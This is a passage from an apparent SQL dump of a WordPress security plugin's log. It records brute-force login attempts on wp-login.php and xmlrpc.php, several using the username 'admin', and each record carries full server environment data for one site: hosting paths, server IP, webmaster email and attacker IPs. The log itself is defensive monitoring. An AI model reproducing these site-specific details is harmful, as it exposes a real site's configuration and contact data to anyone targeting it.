okie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"50.31.26.18\";s:11:\"REMOTE_PORT\";s:5:\"53244\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXN1BXoC3wh6TCR17WvHHQAAAQQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567847685.2278\";s:12:\"REQUEST_TIME\";s:10:\"1567847685\";}}','notice','2019-09-07 09:14:46','2019-09-07 09:14:45',17748416,19235008,'https://bintara.com.my/wp-login.php',1,0,'50.31.26.18'),(23685,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"50.31.26.18\";s:11:\"REMOTE_PORT\";s:5:\"53244\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXN1BXoC3wh6TCR17WvHHQAAAQQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567847685.2278\";s:12:\"REQUEST_TIME\";s:10:\"1567847685\";}}','notice','2019-09-07 09:14:47','2019-09-07 09:14:45',17909776,19235008,'https://bintara.com.my/wp-login.php',1,0,'50.31.26.18'),(23686,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"50.31.26.18\";s:11:\"REMOTE_PORT\";s:5:\"53417\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXN1CHoC3wh6TCR17WvHIAAAARI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567847688.3494\";s:12:\"REQUEST_TIME\";s:10:\"1567847688\";}}','notice','2019-09-07 09:14:49','2019-09-07 09:14:48',18258168,19554528,'https://bintara.com.my/xmlrpc.php',1,0,'50.31.26.18'),(24851,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"23.229.84.90\";s:11:\"REMOTE_PORT\";s:5:\"38742\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGVJW4SfF9g@8lNlxwrZgAAAFQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568773413.5727\";s:12:\"REQUEST_TIME\";s:10:\"1568773413\";}}','notice','2019-09-18 02:23:35','2019-09-18 02:23:34',18252288,19549368,'https://bintara.com.my/xmlrpc.php',1,0,'23.229.84.90'),(24852,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"104.238.125.133\";s:11:\"REMOTE_PORT\";s:5:\"58220\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGVNCR0vdvYEIduPCLWMQAAAQE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568773428.3354\";s:12:\"REQUEST_TIME\";s:10:\"1568773428\";}}','notice','2019-09-18 02:23:49','2019-09-18 02:23:48',17737704,19227544,'https://bintara.com.my/wp-login.php',1,0,'104.238.125.133'),(24853,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"104.238.125.133\";s:11:\"REMOTE_PORT\";s:5:\"58718\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGVNq1FqYKvioG46Y4LGQAAAJE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568773431.0388\";s:12:\"REQUEST_TIME\";s:10:\"1568773431\";}}','notice','2019-09-18 02:23:52','2019-09-18 02:23:51',18254104,19549680,'https://bintara.com.my/xmlrpc.php',1,0,'104.238.125.133'),(24854,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"192.99.47.10\";s:11:\"REMOTE_PORT\";s:5:\"33914\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGW0iqbKGlf1IVly7OR7AAAAUc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568773843.0227\";s:12:\"REQUEST_TIME\";s:10:\"1568773843\";}}','notice','2019-09-18 02:30:44','2019-09-18 02:30:43',17743656,19234176,'https://bintara.com.my/wp-login.php',1,0,'192.99.47.10'),(24855,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"192.99.47.10\";s:11:\"REMOTE_PORT\";s:5:\"35232\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGW1a1FqYKvioG46Y4MNQAAAIY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568773845.9855\";s:12:\"REQUEST_TIME\";s:10:\"1568773845\";}}','notice','2019-09-18 02:30:47','2019-09-18 02:30:46',18258480,19556832,'https://bintara.com.my/xmlrpc.php',1,0,'192.99.47.10'),(24856,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"94.23.32.126\";s:11:\"REMOTE_PORT\";s:5:\"41720\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGYlq1FqYKvioG46Y4N@wAAAIc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568774294.3918\";s:12:\"REQUEST_TIME\";s:10:\"1568774294\";}}','notice','2019-09-18 02:38:16','2019-09-18 02:38:15',17741184,19233504,'https://bintara.com.my/wp-login.php',1,0,'94.23.32.126'),(24857,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 